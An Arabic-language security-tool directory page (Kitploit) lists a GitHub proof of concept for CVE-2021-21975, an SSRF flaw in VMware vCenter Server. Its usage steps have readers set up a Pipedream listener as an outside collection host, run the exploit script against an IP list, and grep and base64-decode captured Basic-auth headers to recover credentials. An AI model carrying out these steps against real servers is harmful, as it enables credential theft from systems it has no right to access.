Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-21975 — إثبات مفهوم لاستغلال الثغرة CVE-2021-21975 (SSRF في VMware vCenter Server) الذي يستغل تزوير الطلبات من جانب الخادم لتسريب بيانات اعتماد مشفرة بـ base64 عبر مصادقة HTTP الأساسية. | Kitploit
أدوات/GitHubGitHub/dorkerdevil/cve-2021-21975
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubdorkerdevil/cve-2021-21975

CVE-2021-21975

إثبات مفهوم لاستغلال الثغرة CVE-2021-21975 (SSRF في VMware vCenter Server) الذي يستغل تزوير الطلبات من جانب الخادم لتسريب بيانات اعتماد مشفرة بـ base64 عبر مصادقة HTTP الأساسية.

عرض المستودع
22منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-21975

SSRF-POC - ssrf إلى تسريب بيانات الاعتماد

أولاً، قم بتكوين عميل pd.

الآن قم بتشغيل ./pd deploy http-new-requests

الآن استبدل طلب HTTP الخاص بـ pipedream مثل: Randomstring.m.pipedream.net في البرنامج النصي

شغّل هذا في طرفية منفصلة - ./pd logs new-requests | tee -a req.txt

والآن شغّل هذا في طرفية أخرى - python3 CVE-2021-21975.py iplist

cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt

"هذا دليل إثبات مبكر تم إنشاؤه عندما أصبح الثغرة عامة قبل أشهر، لذا استخدمه على مسؤوليتك الخاصة." :V

شكر وتقدير

@wabaf3t @D0rkerDevil

تنزيل الأداة